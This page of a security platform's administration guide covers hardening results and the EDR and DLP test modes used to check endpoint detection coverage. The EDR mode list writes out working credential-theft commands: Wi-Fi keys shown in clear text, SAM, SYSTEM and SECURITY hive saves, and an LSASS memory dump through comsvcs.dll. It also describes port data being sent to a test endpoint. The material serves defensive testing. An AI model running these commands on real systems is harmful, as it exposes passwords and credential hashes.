LogoLogo
Log In
  • Introduction
  • Registration
  • Pre-Requirements & Initialization of the Platform
    • Agent Installations
      • Windows Installation
      • Linux Installation
      • macOS Installation
      • Deploying Agent From Microsoft Intune
    • Access and Exlusion Requirements
      • Agent-Based Demo Deployment
      • Agent-Based Production Deployment
      • Agent-Based On-Premises Deployment
      • Trendmicro Exlusions
    • Troubleshooting
  • Getting Started
    • Platform Overview
    • Agent Based Deployment
      • 1. Activating Policies
      • 2. Configure Policies in the Group
      • 3. Agent Deployment
        • Windows: Downloading and Deploying The Windows Agent
        • Linux: Downloading and Deploying The Linux Agent
        • macOS: Downloading and Deploying The macOSAgent
      • 4. Enabling Classification Rules
      • 5. Review The Results & White Listing
      • 6. Reviewing and Enabling Sigma Rules
      • 7. Generating Reports
      • 8. Notification Settings
      • 9. YARA Analysis & THOR
      • 10. Configuring YARA Rules
      • 11. Remediation Management
      • 12. Results of The Analysis
    • Using the Main Dashboard and Grids
    • Classification Rules
    • Configuring Modules
      • Threat Hunting
        • Enabling Windows Autoruns & Process Analysis
        • Enabling Weak SNMP Discovery
        • Enabling Linux Analysis
        • Job Management
        • Customizing Classification Rules
        • Enabling Windows Event Log Analysis
        • Enabling Windows Sysmon Analysis
        • Enabling Windows Thor Analysis
        • Enabling Windows Security Benchmark Analysis
        • Enabling In-Depth Analysis
      • Windows Hardening
      • Remediation & Response Management
      • Notification Management
      • Vulnerability Management
      • Network Discovery
      • Windows Patch Management
      • IP Scanning
      • Software Management
      • Managing Shadow-IT
      • Microsoft Windows Defender Health Analysis
    • Configuring Sysmon
      • Sysmon Deployment
      • Managing Sysmon Rules
      • Troubleshooting Sysmon Rules
    • Important Settings
      • Organization Settings
    • Utilizing the Platform Effectively and Interpreting the Artifact Analysis Results
    • How To Manage False Positives and Optimizing the System
    • Using AI Modules
      • AI Manuel Enrichment
      • AI Auto Enrichment
      • Automating AI Enrichment
      • AI Auto Exclusions
      • AI Feedback Questions
      • AI Auto Exclusion & Enrichment for Sysmon
      • AI Activity Logs
    • GRC Management
      • Creating an Assessment & Updating Evidences
    • Integrations
      • Office 365 Azure Registration
      • Windows Security Center Azure Registration
      • Azure Active Directory Integration
      • Active Directory Integration
      • CrowdStrike Integration
      • Palo Alto - Cortex Integration
      • Palo Alto HyperVisor Integration
      • OpenVAS Integration
      • Tenable Nessus
      • Gophish Integration
    • How to Use CyberCyte Platform Effectively?
    • Enabling External Exposure Analysis
  • Administration Guide
    • Most Used
      • Threat Overview
      • Analysis & Investigation
      • Shadow IT
      • My Assignments
      • Installation Management
      • Policy Management
      • Windows Hardening Results
      • Device Management
    • Dashboards
      • Threat Overview
      • Asset Overview
      • User Overview
      • Shadow IT
      • Analysis
    • Threat Hunting
      • Notable Events
      • Analysis & Investigation
      • Visualization
      • Hunting Settings
      • E-Mail/Teams Settings
    • Threat Response
      • Response Management
      • Incident /Case Management
      • ToDo
      • Remediation & Response Settings
      • Incident /Case Management
      • Incident/Case Management Settings
      • AI Activity
      • Interactive Sessions
    • Security Assurance
      • Hardening & Configuration Management
      • Vulnerability Management
      • Windows Remediation
      • Linux Remediation
      • Software Management
      • Windows Patch Management
      • Windows Remediation & Response Settings
      • Hardening & Configuration Management Settings
    • Asset Management
      • Endpoint Management
      • Group Management
      • Settings
    • Rules & Policies
      • Artifact Classification
      • Policy Management
      • SIGMA/YARA Rules
      • Artifact Collection Parameters
    • GRC
      • Assessment Management
      • Risk and Oppurtunity Management
      • Incident/Case Management
      • Assets
      • Document Management
      • Evidences
      • ToDo & Project Management
      • Parameters
      • Settings
      • Incident/Case Management Settings
    • Settings & Reporting
      • Agents Settings
      • Deployment Settings
      • Notification Settings
      • Integration Settings
      • AI Settings
      • Credential Settings
      • Organization Settings
      • Reporting
      • Users & Groups
    • Help
      • Ask AI
      • Configuration Wizard
      • Help Guide
      • Search
      • Version & Exception Overviews
      • Troubleshoot
    • How To Manage False Positives and Optimizing the System
  • Troubleshooting
    • Troubleshooting Multitenant Functionalities & Accessing Internal Applications
    • The Agent Troubleshooting
      • Troubleshooting the Windows Agent
      • Troubleshooting the Linux Agent
      • Troubleshooting the macOS Agent
    • Proxy Troubleshooting
      • Portal Server
      • Elastic Server
    • AI Automation Troubleshooting
      • Checking the AI Mode
      • Checking AI Audit Logs
      • Checking the AI Settings
    • Troubleshooting Synchronization Problems
  • Release Notes
    • v3.3.6
    • v3.3.5
    • v3.3.4
    • v3.3.3
    • v3.3.2
    • v3.3.1
    • v3.3
    • v3.2.1
    • v3.2
    • v3.1.4
    • v3.1.3
    • v3.1.2
    • v3.1.1
    • v3.1
    • v3.0.10
    • v3.0.8-9
    • v3.0.7
    • v3.0.6
    • v3.0.5
    • v3.0.4
    • v3.0.3
    • v3.0.2
    • v3.0.1
    • v3.0
    • v2.5.0 - v2.17.7
Powered by GitBook
On this page

Was this helpful?

  1. Administration Guide
  2. Security Assurance

Hardening & Configuration Management

PreviousSecurity AssuranceNextVulnerability Management

Last updated 9 months ago

Was this helpful?

  • Windows Hardening Results: This section displays the client machines and server hardening results. Benchmark controls are based on CIS and DOD, and these benchmarks are global standards. The Portal separates the results by risk scoring so that users can get more accurate results after analysis. Users can remediate results for a single machine, a group, or all devices on the portal. Also, users can trust the result by adding the rule to the classification rule. For multi-host hardening actions, it is recommended to use the Windows Hardening Results by Name section.

  • Right-click the "Remediation -> Remediate Security Control" option for remediation. After that, on the right side of the page, a small modal will appear, and users will define the settings for the job.

  • Please go to the "Security Assurance -> Remediation" page to see the remediation job. All the jobs are displayed on that page.

  • Windows Hardening Results by Name: This section displays benchmark controls aggregated by name. Also, the results are grouped by risk scores for better visibility. The same actions can be performed on the page.

  • Windows Security Controls Backup Values: This section allows users to roll back to old values before executing the remediation job. The Portal always backs up every value that has been remediated.

  • Security Control Results: This section displays security control results by benchmark standards. The users can analyze and remediate the failed results.

  • Windows EDR Analysis: This section displays EDR testing scenario results. The users can analyze and get feedback for EDR coverage of their system.

  • Windows DLP Analysis: This section displays DLP testing scenario results. The users can analyze and get feedback for DLP coverage of their system.


For EDR analysis we have 8 different modes that change the type of the action. We can change the EDR analysis mode with the EDR Policy. The mode type is below with a detailed explanation:

  • Basic: This mode runs defined basic commands. These commands are:

    • "powershell "Get-Process | Select-Object -Property ProcessName, Id, CPU | Sort-Object -Property CPU -Descending"",

    • "powershell "netsh wlan show profiles | Select-String -Pattern 'All User Profile' -AllMatches | ForEach-Object { _ -replace 'All User Profile *: ', '' } | ForEach-Object { netsh wlan show profile name=\"_" key=clear }"",

    • "powershell "Get-ADUser -Filter * -Properties * | Select-Object -Property Name, Enabled, LastLogonDate"",

    • "powershell "Get-NetIPConfiguration | Select-Object -Property InterfaceAlias, IPv4Address, IPv6Address, DNServes"",

    • "quser",

    • "net localgroup administrators",

    • "netsh firewall show all",

    • "net sessions",

    • "reg save hklm\sam ss.dat"

  • File Encryption: This mode encrypts created files on the host computer. These files are created from built-in files. The number of files are defined in EDR policy but the default value is 10.

  • LSASS Dump: This mode tries to create a dump file for LSASS by using the command below:

    • "powershell -Command "$lsass = Get-Process -Name lsass; $lsassId = $lsass.Id; $dumpPath = 'C:\temp\out.dmp'; $command = 'rundll32.exe C:\windows\System32\comsvcs.dll, MiniDump ' + $lsassId + ' ' + $dumpPath + ' full'; Invoke-Expression $command""

  • Aggressive: This mode firts runs predefined commands and then applies selected action by user in the policy. Aggressive mode commands are:

    • "powershell "Get-Process | Select-Object -Property ProcessName, Id, CPU | Sort-Object -Property CPU -Descending"",

    • "powershell "netsh wlan show profiles | Select-String -Pattern 'All User Profile' -AllMatches | ForEach-Object { _ -replace 'All User Profile *: ', '' } | ForEach-Object { netsh wlan show profile name=\"_" key=clear }"",

    • "powershell "Get-ADUser -Filter * -Properties * | Select-Object -Property Name, Enabled, LastLogonDate"",

    • "powershell "Get-NetIPConfiguration | Select-Object -Property InterfaceAlias, IPv4Address, IPv6Address, DNServes"",

    • "quser",

    • "net localgroup administrators",

    • "netsh firewall show all",

    • "net sessions",

    • "reg save hklm\sam ss.dat",

    • "Reg.exe save HKLM\SYSTEM system.save",

    • "Reg.exe save HKLM\SECURITY security.save"

For the selected action, the first agent creates a file using built-in files and then based on the selection, encrypts or deletes that file.

  • Custom: This mode runs a custom script defined by the user in the EDR policy.

  • Stealth: This mode applies selected actions by the user in the policy. For the selected action, the first agent creates a file using built-in files and then based on the selection, encrypts or deletes that file.

C2: This mode first tries to get user directories and after that pings the local subnet for open ports. If any open ports are found, the agent tries to send those port info to a dummy API which is ""

Portscan: This mode pings the local subnet for open ports. If any open ports are found, the agent tries to send those port info to a dummy API which is ""

https://clapi.cloudcyte.com/console/public/api/externaldatatest
https://clapi.cloudcyte.com/console/public/api/externaldatatest